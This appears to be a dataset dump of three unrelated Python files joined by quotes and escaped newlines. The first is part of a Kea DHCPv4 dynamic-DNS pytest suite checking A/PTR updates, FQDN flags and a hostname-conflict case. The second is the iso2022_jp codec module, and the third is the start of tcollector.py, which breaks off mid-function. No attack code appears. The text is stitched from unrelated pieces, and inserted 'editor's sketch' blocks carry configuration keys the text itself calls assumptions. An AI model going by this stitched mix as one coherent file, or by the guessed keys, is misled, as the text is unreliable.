misc.test_procedure()\n srv_msg.client_sets_value(\'Client\', \'chaddr\', \'00:00:00:00:00:12\')\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'client2.four.example.com.\')\n srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'S\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 1)\n srv_msg.response_check_option_content(81, \'fqdn\', \'client2.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'client2.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'client2.four.example.com.\')\n\n\n@pytest.mark.v4\n@pytest.mark.ddns\n@pytest.mark.notsig\n@pytest.mark.forward_reverse_add\ndef test_ddns4_notsig_forw_and_rev_dhci_conflicts_Sflag():\n\n misc.test_setup()\n srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n srv_control.add_ddns_server_options(\'enable-updates\', True)\n srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n srv_control.build_and_send_config_files()\n srv_control.start_srv(\'DHCP\', \'started\')\n\n srv_control.use_dns_set_number(20)\n srv_control.start_srv(\'DNS\', \'started\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'client1.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'client2.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.client_sets_value(\'Client\', \'chaddr\', \'00:00:00:00:00:11\')\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, 
\'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_sets_value(\'Client\', \'chaddr\', \'00:00:00:00:00:11\')\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'client1.four.example.com.\')\n srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'S\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 1)\n srv_msg.response_check_option_content(81, \'fqdn\', \'client1.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'client1.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'client1.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'client1.four.example.com.\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'127.0.0.1.in-addr.arpa.\')\n\n # Client 2 add\n misc.test_procedure()\n srv_msg.client_sets_value(\'Client\', \'chaddr\', \'00:00:00:00:00:12\')\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_sets_value(\'Client\', \'chaddr\', \'00:00:00:00:00:12\')\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'client2.four.example.com.\')\n srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'S\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 1)\n srv_msg.response_check_option_content(81, \'fqdn\', \'client2.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'client2.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'client2.four.example.com.\')\n\n misc.test_procedure()\n 
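# --- editor\'s sketch (illustrative model, not part of the original test) ---\n    # The conflict this test exercises is RFC 4703-style DHCID matching: an\n    # update to an existing FQDN is only applied when the stored client\n    # identity matches, which is why the takeover attempt further below must\n    # leave client1\'s records untouched.\n    _dhcid_by_fqdn = {\'client1.four.example.com.\': \'00:00:00:00:00:11\'}\n    def _may_update(fqdn, chaddr):\n        return _dhcid_by_fqdn.get(fqdn, chaddr) == chaddr   # unknown name -> free to add\n    assert not _may_update(\'client1.four.example.com.\', \'00:00:00:00:00:12\')\n    # --- end sketch ---\n    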
srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'client2.four.example.com.\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'127.0.0.1.in-addr.arpa.\')\n\n # Client 2 try to update client\'s 1 domain\n misc.test_procedure()\n srv_msg.client_sets_value(\'Client\', \'chaddr\', \'00:00:00:00:00:12\')\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_sets_value(\'Client\', \'chaddr\', \'00:00:00:00:00:12\')\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'client1.four.example.com.\')\n srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'S\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 1)\n srv_msg.response_check_option_content(81, \'fqdn\', \'client1.four.example.com.\')\n\n # address and domain name should not be changed!\n misc.test_procedure()\n srv_msg.dns_question_record(\'client1.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'client1.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'client1.four.example.com.\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'127.0.0.1.in-addr.arpa.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'client2.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n\n@pytest.mark.v4\n@pytest.mark.ddns\n@pytest.mark.notsig\n@pytest.mark.forward_reverse_add\ndef test_ddns4_notsig_forw_and_rev_add_success_withoutflag_override_client():\n\n misc.test_setup()\n srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n srv_control.add_ddns_server_options(\'override-client-update\', True)\n srv_control.add_ddns_server_options(\'enable-updates\', 
True)\n srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n srv_control.build_and_send_config_files()\n srv_control.start_srv(\'DHCP\', \'started\')\n\n srv_control.use_dns_set_number(20)\n srv_control.start_srv(\'DNS\', \'started\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.client_requests_option(1)\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'aa.four.example.com.\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 3)\n srv_msg.response_check_option_content(81, \'fqdn\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'aa.four.example.com.\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'127.0.0.1.in-addr.arpa.\')\n\n\n@pytest.mark.v4\n@pytest.mark.ddns\n@pytest.mark.notsig\n@pytest.mark.reverse_add\ndef test_ddns4_notsig_rev_success_withoutflag():\n\n misc.test_setup()\n srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n srv_control.add_ddns_server_options(\'enable-updates\', True)\n srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n srv_control.build_and_send_config_files()\n srv_control.start_srv(\'DHCP\', \'started\')\n\n srv_control.use_dns_set_number(20)\n srv_control.start_srv(\'DNS\', \'started\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', 
\'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.client_requests_option(1)\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'aa.four.example.com.\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 0)\n srv_msg.response_check_option_content(81, \'fqdn\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'aa.four.example.com.\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'127.0.0.1.in-addr.arpa.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n\n@pytest.mark.v4\n@pytest.mark.ddns\n@pytest.mark.notsig\n@pytest.mark.reverse_add\ndef test_ddns4_notsig_rev_withoutflag_notenabled():\n\n misc.test_setup()\n srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n srv_control.add_ddns_server_options(\'enable-updates\', False)\n srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n srv_control.build_and_send_config_files()\n srv_control.start_srv(\'DHCP\', \'started\')\n\n srv_control.use_dns_set_number(20)\n srv_control.start_srv(\'DNS\', \'started\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n 
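# --- editor\'s sketch (illustrative; the exact JSON the framework emits is not\n    # shown in this file, and the key names below are assumptions based on the\n    # Kea \'dhcp-ddns\' configuration documentation) ---\n    # The srv_control calls above are assumed to assemble a config block like:\n    _ddns_cfg = {\n        \'dhcp-ddns\': {\n            \'enable-updates\': False,\n            \'server-ip\': \'127.0.0.1\',\n            \'server-port\': 53001,\n            \'generated-prefix\': \'four\',\n            \'qualifying-suffix\': \'example.com\',\n        },\n    }\n    # --- end sketch ---\n    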
misc.test_procedure()\n    srv_msg.client_requests_option(1)\n    srv_msg.client_send_msg(\'DISCOVER\')\n\n    misc.pass_criteria()\n    srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n    srv_msg.response_check_include_option(1)\n    srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n    srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n    misc.test_procedure()\n    srv_msg.client_copy_option(\'server_id\')\n    srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n    srv_msg.client_requests_option(1)\n    srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'aa.four.example.com.\')\n    srv_msg.client_does_include(\'Client\', \'fqdn\')\n    srv_msg.client_send_msg(\'REQUEST\')\n\n    misc.pass_criteria()\n
    srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n    srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n    srv_msg.response_check_include_option(1)\n    srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n    srv_msg.response_check_include_option(81)\n    # Response option 81 MUST contain flags 0.\n    # TODO: later check the \'s\', \'n\' and \'o\' flag bits individually (expected value: 10)\n    srv_msg.response_check_option_content(81, \'fqdn\', \'aa.four.example.com.\')\n\n    misc.test_procedure()\n    srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n    srv_msg.client_send_dns_query()\n\n    misc.pass_criteria()\n    srv_msg.send_wait_for_query(\'MUST\')\n    srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n    misc.test_procedure()\n    srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n    srv_msg.client_send_dns_query()\n\n    misc.pass_criteria()\n    srv_msg.send_wait_for_query(\'MUST\')\n    srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n\n@pytest.mark.v4\n@pytest.mark.ddns\n@pytest.mark.notsig\n@pytest.mark.reverse_add\ndef test_ddns4_notsig_rev_Nflag_override_no_update():\n\n    misc.test_setup()\n    srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n    srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n    srv_control.add_ddns_server_options(\'override-no-update\', True)\n    srv_control.add_ddns_server_options(\'enable-updates\', True)\n    srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n    srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n    srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n    srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n    srv_control.build_and_send_config_files()\n    srv_control.start_srv(\'DHCP\', \'started\')\n\n    srv_control.use_dns_set_number(20)\n    srv_control.start_srv(\'DNS\', \'started\')\n\n    misc.test_procedure()\n    srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n    srv_msg.client_send_dns_query()\n\n    misc.pass_criteria()\n    srv_msg.send_wait_for_query(\'MUST\')\n    srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n    misc.test_procedure()\n    srv_msg.client_requests_option(1)\n    srv_msg.client_send_msg(\'DISCOVER\')\n\n    misc.pass_criteria()\n    srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n    srv_msg.response_check_include_option(1)\n    srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n    srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n    misc.test_procedure()\n    srv_msg.client_copy_option(\'server_id\')\n    srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n    srv_msg.client_requests_option(1)\n    srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'N\')\n    srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'aa.four.example.com.\')\n    
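# --- editor\'s sketch (illustrative, not part of the original test) ---\n    # With \'override-no-update\' enabled, the client\'s N bit (0x8, \'server, do\n    # no updates\') is overridden: the server performs both updates anyway and\n    # answers with S and O set, which is exactly the \'flags\', 3 assertion below.\n    _client_flags = 0x8                 # N bit, set by FQDN_flags \'N\' above\n    _server_flags = 0x1 | 0x2           # S|O in the resulting ACK\n    assert _server_flags == 3\n    # --- end sketch ---\n    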
srv_msg.client_does_include(\'Client\', \'fqdn\')\n    srv_msg.client_send_msg(\'REQUEST\')\n\n    misc.pass_criteria()\n    srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n    srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n    srv_msg.response_check_include_option(1)\n    srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n    srv_msg.response_check_include_option(81)\n    srv_msg.response_check_option_content(81, \'flags\', 3)\n    srv_msg.response_check_option_content(81, \'fqdn\', \'aa.four.example.com.\')\n\n    misc.test_procedure()\n    srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n    srv_msg.client_send_dns_query()\n\n    misc.pass_criteria()\n    srv_msg.send_wait_for_query(\'MUST\')\n    srv_msg.dns_option(\'ANSWER\')\n    srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'aa.four.example.com.\')\n    srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'127.0.0.1.in-addr.arpa.\')\n\n    misc.test_procedure()\n    srv_msg.dns_question_record(\'aa.four.example.com.\', \'A\', \'IN\')\n    srv_msg.client_send_dns_query()\n\n    misc.pass_criteria()\n    srv_msg.send_wait_for_query(\'MUST\')\n    srv_msg.dns_option(\'ANSWER\')\n    srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n    srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'aa.four.example.com.\')\n',
""#\n# iso2022_jp.py: Python Unicode Codec for ISO2022_JP\n#\n# Written by Hye-Shik Chang dummy@email.com\n#\n\nimport _codecs_iso2022, codecs\nimport _multibytecodec as mbc\n\ncodec = _codecs_iso2022.getcodec('iso2022_jp')\n\nclass Codec(codecs.Codec):\n    encode = codec.encode\n    decode = codec.decode\n\nclass IncrementalEncoder(mbc.MultibyteIncrementalEncoder,\n                         codecs.IncrementalEncoder):\n    codec = codec\n\nclass IncrementalDecoder(mbc.MultibyteIncrementalDecoder,\n                         codecs.IncrementalDecoder):\n    codec = codec\n\nclass StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):\n    codec = codec\n\nclass StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):\n    codec = codec\n\ndef getregentry():\n    return codecs.CodecInfo(\n        name='iso2022_jp',\n        encode=Codec().encode,\n        decode=Codec().decode,\n        incrementalencoder=IncrementalEncoder,\n        incrementaldecoder=IncrementalDecoder,\n        streamreader=StreamReader,\n        streamwriter=StreamWriter,\n    )\n"",
'#!/usr/bin/env python\n# This file is part of tcollector.\n# Copyright (C) 2010 The tcollector Authors.\n#\n# This program is free software: you can redistribute it and/or modify it\n# under the terms of the GNU Lesser General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or (at your\n# option) any later version. This program is distributed in the hope that it\n# will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty\n# of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser\n# General Public License for more details. You should have received a copy\n# of the GNU Lesser General Public License along with this program. If not,\n# see .\n#\n# tcollector.py\n#\n""""""Simple manager for collection scripts that run and gather data.\n   The tcollector gathers the data and sends it to the TSD for storage.""""""\n#\n# by Mark Smith dummy@email.com.\n#\n\nimport atexit\nimport errno\nimport fcntl\nimport logging\nimport os\nimport random\nimport re\nimport signal\nimport socket\nimport subprocess\nimport sys\nimport threading\nimport time\nimport json\nimport urllib2\nimport base64\nfrom logging.handlers import RotatingFileHandler\nfrom Queue import Queue\nfrom Queue import Empty\nfrom Queue import Full\nfrom optparse import OptionParser\n\n\n# global variables.\nCOLLECTORS = {}\nGENERATION = 0\nDEFAULT_LOG = \'/var/log/tcollector.log\'\nLOG = logging.getLogger(\'tcollector\')\nALIVE = True\n# If the SenderThread catches more than this many consecutive uncaught\n# exceptions, something is not right and tcollector will shutdown.\n# Hopefully some kind of supervising daemon will then restart it.\nMAX_UNCAUGHT_EXCEPTIONS = 100\nDEFAULT_PORT = 4242\nMAX_REASONABLE_TIMESTAMP = 1600000000  # Good until September 2020 :)\n# How long to wait for datapoints before assuming\n# a collector is dead and restarting it\nALLOWED_INACTIVITY_TIME = 600  # seconds\nMAX_SENDQ_SIZE = 10000\nMAX_READQ_SIZE = 100000\n\n\ndef register_collector(collector):\n    """"""Register a collector with the COLLECTORS global""""""\n\n    assert isinstance(collector, Collector), ""collector=%r"" % (collector,)\n    # store it in the global list and initiate a kill for anybody with the\n    # same name that happens to still be hanging around\n    if collector.name in COLLECTORS:\n        col = COLLECTORS[collector.name]\n        if col.proc is not None:\n            LOG.error(\'%s still has a process (pid=%d) and is being reset,\'\n                      \' terminating\', col.name, col.proc.pid)\n            col.shutdown()\n\n    COLLECTORS[collector.name] = collector\n\n\nclass ReaderQueue(Queue):\n    """"""A Queue for the reader thread""""""\n\n    def nput(self, value):\n        """"""A nonblocking put, that simply logs and discards the value when the\n        queue is full, and returns false if we dropped.""""""\n        try:\n            
